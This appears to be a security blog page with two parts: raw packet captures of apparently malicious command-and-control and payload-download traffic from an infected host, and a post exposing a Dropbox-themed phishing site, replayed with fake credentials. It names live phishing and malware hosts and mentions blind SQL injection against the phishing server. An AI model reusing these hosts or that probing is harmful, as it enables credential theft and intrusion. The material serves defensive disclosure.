2016-08-25 20:42:53.753273 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 343:686, ack 99559, win 260, length 343: HTTP: GET /module/311ac29c5a8f6b4e7a247db98207fd6e HTTP/1.1
E…    ……….f\?o..X.P3..k..$.P…….GET /module/311ac29c5a8f6b4e7a247db98207fd6e HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:54.597357 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 686:1029, ack 128966, win 1046, length 343: HTTP: GET /module/a104f2955999a2f1a1c881e8930b82f6 HTTP/1.1
E…    ……….f\?o..X.P3……aP…tp..GET /module/a104f2955999a2f1a1c881e8930b82f6 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:55.538846 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 1029:1372, ack 219620, win 1087, length 343: HTTP: GET /module/d1967c99c0c7f9b468f2e08e59e41ffe HTTP/1.1
E…
……a…f\?o..X.P3…….P..?.2..GET /module/d1967c99c0c7f9b468f2e08e59e41ffe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:55.975976 IP 192.168.1.102.51801 > 188.166.10.125.443: Flags [P.], seq 267:749, ack 799, win 257, length 482
E..
P\…._`…f..
}.Y….. !..{P….!…….Y.^s..`…..G…b..7……….<.t.M.vt:_..u..PV.adc../n.]D…H\N.U.xv.^…x..
..#Y.0.V…k.oz.D…N..|8……….R..9.s.(.1&..S……2…….Dx…..*..4……g..u.@….=![…..1.b:.9….L>EK…….B$.”`;…._.gU.Jx.h.E…8…:{n.C…M.
………t..R.7b.<……………”f..MIE……-…c..x..l….cwU1#.p.B…T$<….w..z.;.:F.9.C6Rj..@e..a@A.c..z.Ex..5…0tYA.(d.c..0W:….x.V.. ..BC. .My……X..1.x.k…..yr..r.4.”..g0…Gg..$s#.X_…._…qJ.%..d>…i.y.EO.[.d=a…1…r.:..|
2016-08-25 20:42:55.977244 IP 192.168.1.102.51801 > 188.166.10.125.443: Flags [P.], seq 749:2209, ack 799, win 257, length 1460
E…P]….[….f..
}.Y……!..{P…………J
.(}…..(“.Ekd.uSfM.i
…8.if.5..H…!…U..-J…_W.[…A~….T….R  …L|.#a.”4..Z..r.Y_.!nV.Kc..<.,.9….V..&..4z.UF..>#.. .6….t……..3..?.|..
…….|^…c;;…..@w……..D..$J.:*..T…v.y……I80.n.t..i{….x.O.’.w…….I..2……..~
.y.f…..X…’..E..Z.Xm.N..rLc  .|..c…|-.,9`t…HN..&v!……..1i….b..0.\.\.X….am………<…P..b5…&   …     E|..5..
…     …D.0!..(…@…I.,”..<..m….^…..c..C.-..1…Q….v…….]..{..XX..B.g7….,I.C.w8.n8.7…OY.#..’R…)..#..k.)t.`..3..ky….Y.9…….8……..=.H…h..$.g.(0…..L8..pc..z.>l.).&..ZLgxN_LC..X4…..Z…. ..SG….|.i…T8….._|…i.~.
.f.J…….mX..O{.L?.e.r…..
..c…P.Ei.r.R8..H{….F…b…*O….
.N../.
/..+..C……B.DI.?………..’…..`…G.1…..A…….y.D…..:.d..^.>.h…*.XF…..N..?._…….Q…Q….gqP..*.3gb…….:…a…..2.\….V………E~..(.. ..M!Y.Mv……y..’….h .0..%j..H..w..%.(….W…L…d.!.I<pp.0FTQ..:.,|F……JT…./.D.3….2.ie-..W%K.P.%.6…a.@’..ID.K9=.q.;{…2…r.^.X}..]…T…….zq.7E..8   .A..W….ka.tw…C).J3…2……..t.>|..).FU/…l-…7.T…”3…..7.
`K.y…~O.0…..nL….4zKU..IU.^.m…[x.!……..4>.-….p..2.J.n6..E..3…..=……..?….G2….B.6;F..
…….
t+.#.b…l.Q…..B8….E…A……}..Fu.. .BA65.
……`.}.`….Z….N..j{%……w….Q……..x.8../.ojR..W.Y…m…..?..~…V..%..zw.._9.T.}….2.’…….L…K…f……..

2016-08-25 20:43:56.038455 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [P.], seq 0:737, ack 1, win 256, length 737: HTTP: POST /cgi-bin/create_profile.cgi HTTP/1.1
E..     ?,….|r…f%….a.PVG……P…….POST /cgi-bin/create_profile.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 1240229404
x-spidermessenger-length: 271
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 388
Cache-Control: no-cache
Cookie: conftime=1472172015; EoRezo=73.172.154.70.1472172015145032

ujXl2iaEv38JRlMCJUzLFNBZ%2FYStRVI1KxpSzMDulRbtDqiqtedG%2Ba9lkB3czzWEVk2q%2BpKe%2BzYM3pyfaM0nZHytTY7H3hmmB%2FeOkC0gLXBl7L%2FxN6fq%2F7%2BgUk3j%2Bx6GmvQfdkf5Kstyif%2FXbpP%2BXMdPE4fI3g3F2KBFPLOG9Q6%2FRvwmoBVICRmM5Y08YbUJMmtMhO%2FFAlSqvxZM7RDfvqJrq9%2BdXdEh0NPsKAaqQz1y%2F85cCMdBQpnLv3EKRVigYb8Hq9UoEBwOwUFskoJkCh0B6anwMwz1qhjY8EbqZ47zDyZowM1CgDPEl%2FCXJ8ZCduedPSrZ6ABN1b1zvFq1%2FUuQW0%2BCwbag
2016-08-25 20:43:56.203003 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [.], ack 1135, win 252, length 0
E..(?-…..R…f%….a.PVG…..?P………….
2016-08-25 20:43:56.203846 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [F.], seq 737, ack 1135, win 252, length 0
E..(?……Q…f%….a.PVG…..?P………….
2016-08-25 20:43:56.707723 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [S], seq 163765992, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4?.@…I….f%….b.P        ……… .*Y…………..
2016-08-25 20:43:56.806333 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [.], ack 2999876834, win 256, length 0
E..(?……….f%….b.P        …..|.P…Zk……..
2016-08-25 20:43:56.806770 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [P.], seq 0:627, ack 1, win 256, length 627: HTTP: POST /cgi-bin/trace.cgi HTTP/1.1
E…?……A…f%….b.P        …..|.P…….POST /cgi-bin/trace.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 1808263860
x-spidermessenger-length: 259
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: log.hmmmilikethat.com
Content-Length: 366
Cache-Control: no-cache

YlFEYq03QpPOdyhwgx6Zd5nR4%2Fs11wdRmVxOegjv%2BLSbuf0%2BAAHXschZmrR23ej7XPDIsfC2dKLEwcBQCeDZfRV3FanrpoqUZ18LjuNjFows9otFCVECIXEZRbn7wupVK8vF2hGr8TlcYhjcVv%2BqYdmbLUMp2h%2BrcOb1oN5mi4kjTQYAh14wHS34yjVTqzR9HJUyit3KypHufUNEUWEl8ROP5HXQePsN98TcSjhVf6E%2FhFApsD84W8klJjeYOI2gZ4NxoNOi6VFa7fTcH5no4TJL9ABC7lIQGsi3m%2B%2Fq86zqcufgWuZBTJyJvIebPKq0RL73bonMtJnQ%2BRP1Tjhc6Q%3D%3D

2016-08-25 20:43:58.162750 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [P.], seq 0:360, ack 1, win 256, length 360: HTTP: GET /download/2/wizzrelease.exe?jUrMqP9yIX5h5h6UFcUJeXtGlI87%2FDHI8ysr%2FnlKCVAh6bPF1YlSGMQBF8SUNejYppAll8HBVYK3uD9XuscO7S4V1eR%2B8joqvZ%2Foe1pMiStyXO6su9nx7GI00Qva0OA3XuydsPp7H1b1IYf%2BKYVUlLI18diFuxN4 HTTP/1.1
E…O……….f. .:.d.P…)l…P….T..GET /download/2/wizzrelease.exe?jUrMqP9yIX5h5h6UFcUJeXtGlI87%2FDHI8ysr%2FnlKCVAh6bPF1YlSGMQBF8SUNejYppAll8HBVYK3uD9XuscO7S4V1eR%2B8joqvZ%2Foe1pMiStyXO6su9nx7GI00Qva0OA3XuydsPp7H1b1IYf%2BKYVUlLI18diFuxN4 HTTP/1.1
Accept: */*
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: download.cleanshot.host
Connection: Keep-Alive
Cache-Control: no-cache

2016-08-25 20:43:59.615381 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1954941, win 5013, length 0
E..(Q……….f. .:.d.P….m.c[P…w ……..
2016-08-25 20:43:59.616127 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1957861, win 5013, length 0
E..(Q……….f. .:.d.P….m.n.P…k………
2016-08-25 20:43:59.617049 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1960781, win 5013, length 0
E..(Q……….f. .:.d.P….m.z+P…`P……..
2016-08-25 20:43:59.617713 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1963701, win 5013, length 0
E..(Q……….f. .:.d.P….m…P…T………
2016-08-25 20:43:59.618785 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1966621, win 5013, length 0
E..(Q……….f. .:.d.P….m…P…I………
2016-08-25 20:43:59.619390 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1969541, win 5013, length 0
E..(Q……….f. .:.d.P….m..cP…>………
2016-08-25 20:43:59.620097 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1972461, win 5013, length 0
E..(Q……….f. .:.d.P….m…P…2………
2016-08-25 20:43:59.620791 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1975381, win 5013, length 0
E..(Q……….f. .:.d.P….m..3P…’H……..
2016-08-25 20:43:59.621533 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1978301, win 5013, length 0
E..(Q……….f. .:.d.P….m…P………….
2016-08-25 20:43:59.622117 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1981221, win 5013, length 0
E..(Q……….f. .:.d.P….m…P….x……..
2016-08-25 20:43:59.622652 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1984141, win 5013, length 0
E..(Q……….f. .:.d.P….m..kP………….
2016-08-25 20:43:59.623266 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1987061, win 5013, length 0
E..(Q……….f. .:.d.P….m…P………….
2016-08-25 20:43:59.623681 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1989981, win 5013, length 0
E..(Q……….f. .:.d.P….m..;P….?……..
2016-08-25 20:43:59.624109 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1992901, win 5013, length 0
E..(Q……….f. .:.d.P….m…P………….
2016-08-25 20:43:59.624515 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1995821, win 5013, length 0
E..(Q……….f. .:.d.P….m…P….o……..
2016-08-25 20:43:59.624930 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 1998741, win 5013, length 0
E..(Q……….f. .:.d.P….m..sP………….
2016-08-25 20:43:59.630861 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2001661, win 5013, length 0
E..(Q……….f. .:.d.P….m…P………….
2016-08-25 20:43:59.631489 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2004581, win 5013, length 0
E..(Q……….f. .:.d.P….m.%CP….7……..
2016-08-25 20:43:59.632653 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2007501, win 5013, length 0

016-08-25 20:43:59.913501 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2914161}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LSY@……..f. .:.d.P….m…….KV…..”m”..m$.Om .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913503 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2915621}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LSZ@……..f. .:.d.P….m…….E……”m”..m$..m .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913624 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2917081}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LS[@……..f. .:.d.P….m…….?……”m”..m$..m .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913627 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2918541}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LS\@……..f. .:.d.P….m…….::…..”m”..m$.km .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913629 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2920001}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LS]@……..f. .:.d.P….m…….4……”m”..m$..m .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913630 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2829481:2921461}{2712681:2810501}{2613401:2665961}{2457181:2576901}], length 0
E..LS^@……..f. .:.d.P….m…………..”m”..m$”.m .Gm”qcm.owm <.m..;m…
2016-08-25 20:43:59.913674 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2971101}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LS_@……..f. .:.d.P….m…….Y …..”m$..m$..m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913786 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2972561}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LS`@……..f. .:.d.P….m…….Sl…..”m$..m$.om”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913789 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2974021}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSa@……..f. .:.d.P….m…….M……”m$..m$.#m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913791 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2975481}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSb@……..f. .:.d.P….m…….H……”m$..m$..m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913793 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2976941}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSc@……..f. .:.d.P….m…….BP…..”m$..m$..m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913836 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2978401}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSd@……..f. .:.d.P….m…….<……”m$..m%.?m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913948 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2979861}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSe@……..f. .:.d.P….m…….6……”m$..m%..m”..m$”.m .Gm”qcm.owm <.
2016-08-25 20:43:59.913951 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [.], ack 2441121, win 5127, options [nop,nop,sack 4 {2969641:2981321}{2829481:2921461}{2712681:2810501}{2613401:2665961}], length 0
E..LSf@……..f. .:.d.P….m…….14…..”m$..m%..m”..m$”.m .Gm”qcm.owm <.

2016-08-25 20:44:31.215512 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [S], seq 2478522633, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Wp@……..f_.d[.f>…A     …… ……………..
2016-08-25 20:44:31.357256 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [.], ack 4209888609, win 256, length 0
E..(Wq….]”…f_.d[.f>…A
…aP….o……..
2016-08-25 20:44:31.411755 IP 192.168.1.102.12102 > 146.158.119.2.22235: UDP, length 60
E..Xo……….f..w./FV..DGH..}.5C…cv….e l……V..4….8….ShZFc……=.awW…E..
2016-08-25 20:44:31.951881 IP 192.168.1.102.63747 > 209.85.201.125.5222: Flags [P.], seq 1522:1575, ack 54, win 253, length 53
E..]}<….`}…f.U.}…f.7!.N.g’P…0…….0.=……;……”….AG…../Tv….Opx..<]…….
2016-08-25 20:44:32.357745 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [P.], seq 0:288, ack 1, win 256, length 288
E..HWr….\….f_.d[.f>…A
…aP….4…….~…4d..x..9…5′!……&.x.4…/.2H.Q..m…H..H.-..J..-.’…4..G.o……D.h.ad8;}..s~….E.}Hb.p.M{.I..gd.u
…;i………..N.Lw.m.&Ud>.r[0J..V………]..
m.a……       …<]..\.#…L…m…   .:..,.6..b8
,O.7….uOV…`..W..8!j……Q…aTY…..F.._.E….P….8…}:,…..Z……>..z[P.
2016-08-25 20:44:32.531071 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [P.], seq 288:752, ack 305, win 255, length 464
E…Ws….[P…f_.d[.f>…B*….P…+f…\p’.{…..B…%OS..Y…~EI…..f…,.J.d.H”.`J.T..!..k]..(K^Q+.No.F…P}.xl..;.H…NY..N..Q.1.X.s……q$…….U.
.       aL…….@6.A.o…Y…….;.wX..B’…#……kZ…%Q.O…F4.}…j.PD.k…Ek.y….%.s..=..A.8…..,.y9..)\.UC….”C…=..x.[r..X. . …_w1…m$}!Z…ds1bs.6,.P…….[1.r_$….DHzd.QeE..g….u..I.m. _..n.t.B.~.#.1.9.v1`.0…F….+Km.’..A..4.s…….d…45.<.A….x.]…7
..M,X….;..}f…..b.LL.^…~..D..^._.B?l…..r./.
…h.4;.N.<\d.P…}…..
.
2016-08-25 20:44:32.558893 IP 192.168.1.102.51699 > 149.56.103.125.10911: Flags [P.], seq 12672:13728, ack 3169, win 256, length 1056
E..HH.@……..f.8g}..*.R..3…9P…o…Wh…2.[…ey..&…)..W.y.BVc(..O…”$..;[}…8..b.S._M.@…iN..p.u{Ag
..V..=’f’p……f.K…..iX..i…….(…w.kK.~.f.*[5..D.T.op.T.n{U…>.?.-..=.-&Y.c.Fz…u…Y.LX.-w…g./….t)…..6P.~#.Ws’XL….}y..T.h.+.1…N._.o./j.jD..Pk.D.*..|0…E…..=.*;]83V……….
.N$.[..A…t..QF…c.T(.+mp+H…..n&.!..gnZ….`.-…..]…`.;…@.0.Bt.j.H     ….
.xMQ….Yee.,….R.V.`.~t..iv.i)s.7.[…c$b?.7…….v0..x.’……’c.f.[.$.6].<…….N.e…..3x *.._P.jS3VA…o.M.7.$.R….Y…..R.r\.*6       ..$E.y{7)f1.r!…9.;.p.\xc.N5……+{S…….u..i.jD..n<“…t.U..$.x.q`…..#X…./…d.cn….v.>.)c……zV…9…..j.;….WZ….mI..h..V-….w.f*.’../..;]s.l”….
……V…)..}.$…r..:y..3..%……Y.O..?[..5X…..kQI. Q……\.s…q.. .KL\..5f=
.x.T.D…N….{bl…..M@…O”()Dv. F.z.?..}…..ry….c..Qt…..lh5.O.:l..#…`’#c.-\…..V&..*…..05..c
iQ.W].C..5a.@…….e…u>(v….DMg.Qa……z.h…..v..m.^7.W..gkN…V/.<)#.IJJ_….E   …Q..b.rE..^{g&C..y.).,…E.4._.IKp..D….c…a’y.l.F….      ……..o..2..<~Q>.O3D^{.r……oh-.X..^…qX.(U.lf.G..4…h..17…’.
2016-08-25 20:44:32.599513 IP 192.168.1.102.51699 > 149.56.103.125.10911: Flags [P.], seq 13728:14784, ack 3169, win 256, length 1056
E..HH.@……..f.8g}..*.R..S…9P…Pa…’..Q.*..vL……\ay..”6..;…2U.4….U.Of.~To@x%….[AM.n.i……;……..e.,….9..’…. ?……+…V..J..$`….f.&9…E:…o.Y..d.`#……=I.]..O.-s.”.-.4g)I….O…$:.L.NIby..n..F.S.>….S.J..,…o..B.-.8W58*…${.5…*..E…..M+J..eo…._..Z..[……._.a)lFz.|……….J…(…^….^`.|..p…….S.X:………U.)….pY…]……X……./o.I2(…@.n’..O….gL/……..@..Z.!…w….x}.{..E.f..s..OK.r.(.Lv#6._.. A.}.Y..7..k…[..r..e..y.3r..>+.5V.H2h..b…..#?…zY.o.1′.-.y.)…4..y.}.v>.9…Z…^……….. .6*….+M…H.bE….0…..z.gB.%MC: 5m..9m.r~…..r.w^<..<%..#.h)..)w..D…….~W.Kb…..&……r&&V….J.h…~.IB.T…… p…5.6I*……&.V.{.p.Gw:.D.7;..u=.o….[Qt…..\k/….)}…
V.p..E.9.C..&;…..A,….’…….|.ss.dY…..4…..{‘G…….OP…H.|*T@G..u5L….H….p<…_3….XC.$.!../t.n(C…S…!..      2…….Gk`^…H.I..1…..A..v..r.<….U…]
/..m..e.

Share Button

ALERT! Very Active PHISHING CAMPAIGN still alive targetting Dropbox Users

I received the link via e-mail but also found it online through some redirects and a dropbox typeo domain name.

The images and page look spot on ….but if you look at the URI like you should you’ll notice right away we got some problems here!

http://glabalinvestment.tk/cost/DROP1/casts/

dropbox_phishing

 

The campaign is stealing your Gmail, Yahoo, MSN, AOL or other e-mail account AS well as your dropbox account – once your e-mail is compromised attackers don’t have much trouble taking over the rest of your accounts with that infamous “reset your password” or “I forgot my password” button.

 

So…let’s play this out – i’ll input some information and we can see what happens.

 

2016-08-21 08:51:27.817436 IP 192.168.1.100.33910 > 94.102.50.50.80: Flags [P.], seq 1:324, ack 1, win 229, options [nop,nop,TS val 32169711 ecr 2715205929], length 323: HTTP: GET /cost/DROP1/casts/ HTTP/1.1
E..w.;@.@……d^f22.v.Pgj$.<>.}….T……
…….)GET /cost/DROP1/casts/ HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-08-21 08:51:28.123701 IP 192.168.1.100.33910 > 94.102.50.50.80: Flags [.], ack 14778, win 463, options [nop,nop,TS val 32169788 ecr 2715206245], length 0
E..4.G@.@……d^f22.v.Pgj&/<>.6….R……
…<…e
2016-08-21 08:51:28.137743 IP 94.102.50.50.80 > 192.168.1.100.33910: Flags [P.], seq 14778:16226, ack 324, win 122, options [nop,nop,TS val 2715206260 ecr 32169762], length 1448: HTTP
E ..E.@.3..l^f22…d.P.v<>.6gj&/…z…….
…t…”‘), local(‘OpenSans-Light’), url(dropbox_files/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format(‘woff’);
}
@font-face {
font-family: ‘Open Sans’;
font-style: normal;
font-weight: 400;
src: local(‘Open Sans’), local(‘OpenSans’), url(dropbox_files/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format(‘woff’);

 

—– Now I’ll POST my credentials:

 

016-08-21 08:55:37.958321 IP 192.168.1.100.33922 > 94.102.50.50.80: Flags [P.], seq 1:532, ack 1, win 229, options [nop,nop,TS val 32232246 ecr 2715456053], length 531: HTTP: POST /cost/DROP1/casts/ HTTP/1.1
E..G./@.@.C….d^f22…P..q;.hbf….T……
…6…5POST /cost/DROP1/casts/ HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

hidCflag=&Email=blah12311%40gmail.com&Passwd=yourgoingdown&signIn=Sign+in&rmShown=1
2016-08-21 08:55:38.088463 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [.], ack 532, win 122, options [nop,nop,TS val 2715456199 ecr 32232246], length 0
E .4..@.3..^^f22…d.P…hbf..sN…z.X…..
…….6
2016-08-21 08:55:38.167398 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [P.], seq 1:298, ack 532, win 122, options [nop,nop,TS val 2715456282 ecr 32232246], length 297: HTTP: HTTP/1.1 200 OK
E .]..@.3..4^f22…d.P…hbf..sN…z!]…..
…….6HTTP/1.1 200 OK
Date: Sun, 21 Aug 2016 12:54:56 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.6.22
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

3

 

2016-08-21 08:55:38.365148 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [P.], seq 298:401, ack 532, win 122, options [nop,nop,TS val 2715456485 ecr 32232298], length 103: HTTP
E ….@.3…^f22…d.P…hc…sN…z…….
…….j61

<script type=”text/javascript”>
<!–
window.location=”verification.php”

</script>

 

UHHHHHHHHHHH – WHAT??? SITE IS PRETENDING TO GOOGLE VERIFY ME!

 

2016-08-21 08:55:38.372853 IP 192.168.1.100.33922 > 94.102.50.50.80: Flags [P.], seq 532:926, ack 406, win 237, options [nop,nop,TS val 32232350 ecr 2715456485], length 394: HTTP: GET /cost/DROP1/casts/verification.php HTTP/1.1
E….3@.@.Db…d^f22…P..sN.hc…..TU…..
……..GET /cost/DROP1/casts/verification.php HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/
Connection: keep-alive

 

Selection_006

 

2016-08-21 09:00:13.756038 IP 192.168.1.100.33930 > 94.102.50.50.80: Flags [P.], seq 1:554, ack 1, win 229, options [nop,nop,TS val 32301196 ecr 2715731847], length 553: HTTP: POST /cost/DROP1/casts/verification.php HTTP/1.1
E..]..@.@……d^f22…PJ…1.a)….T……
……..POST /cost/DROP1/casts/verification.php HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/verification.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

challengetype=PhoneVerificationChallenge&phoneNumber=4438481234&recEmail=

2016-08-21 09:00:14.208222 IP 94.102.50.50.80 > 192.168.1.100.33930: Flags [P.], seq 298:404, ack 554, win 122, options [nop,nop,TS val 2715732299 ecr 32301248], length 106: HTTP
E ….@.2.N.^f22…d.P..1.bRJ……z1……
…K….64

<script type=”text/javascript”>
<!–
window.location=”https://dropbox.com”;

</script>

 

Selection_007

 

 

This is a good example of slight of hand, if you had been watching a movie or barely paying attention you may have input your credentials into the phishing site, been reaffirmed when you saw what looked like the standard Google verification screen prompt and after you put in any phone number or e-mail (it doesn’t check obviously) you are redirected to the place you thought you went to all along which is the real dropbox.com.

 

Ironically enough, the phishing site has a blind SQLi vulnerability, we were not able to grab a shell but we did get a good count of how many victims they have already hit thus far looking at the auto-incrementing primary key ID value which was as high as 11,200.

Share Button